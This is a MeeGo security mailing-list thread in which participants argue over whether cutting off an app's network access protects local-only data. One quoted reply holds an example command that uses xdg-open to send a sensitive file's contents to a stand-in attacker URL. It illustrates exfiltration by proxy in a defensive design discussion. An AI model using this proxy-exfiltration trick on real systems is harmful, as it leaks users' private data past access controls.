[Meego-security-discussion] Arbitrary 3rd Party Code

[Michael Leibowitz]

On 04/07/2011 04:32 PM, Praveen Gupta wrote:
> URL is not usable.. Please re-send..
That wasn't a valid URL, it was an example of gaining network access by 
proxy.

My point was that disabling network access seems simple but is harder 
than it seems.  Not only must one shut off the ability to directly make 
network connections, but one must make sure that it is not possible to 
use other means to use the network through an intermediary that may not 
be able to distinguish that the network is being accessed.  In other 
words, unless you carry the "label" concept end-to-end, you're just 
fooling yourself.

Cheers
> Again, separation of local-access only data is, just, one usecase..
>
> There are several other usecases.. For example -
>
> * Separation of "enterprise", "Carrier" and "application-sensitive" data
> * Restriction of data cross-over from one domain to another
>
> Mobile platforms has "unique" security requirements.
>
> Implementation of these requirements is *necessary* for adoption of mobile
> platforms by "sensitive" enterprise applications (for example).. Several
> other such scenarios / use-cases exists.
>
> We need *requirements* which we can map to different Meego releases..
>
> After requirements are frozen, we need to propose "architecture" with
> release plan.
>
> Thx, -Praveen
>
> -----Original Message-----
> From: Michael Leibowitz [mailto:michael.leibowitz at intel.com]
> Sent: Thursday, April 07, 2011 4:06 PM
> To: pgupta at mobilestack.com
> Cc: Andy Ross; meego-security-discussion at lists.meego.com
> Subject: Re: [Meego-security-discussion] Arbitrary 3rd Party Code
>
> On 04/07/2011 03:53 PM, pgupta at mobilestack.com wrote:
>> Correct.
>>
>> By identifying data as local access data only, we should "disable" network
> access for such aplication and solve this problem
>
> xdg-open http://l33th4x0rs.com/pwnme?file=$sensitive_file&data=.....
>
> Cheers
>
>
>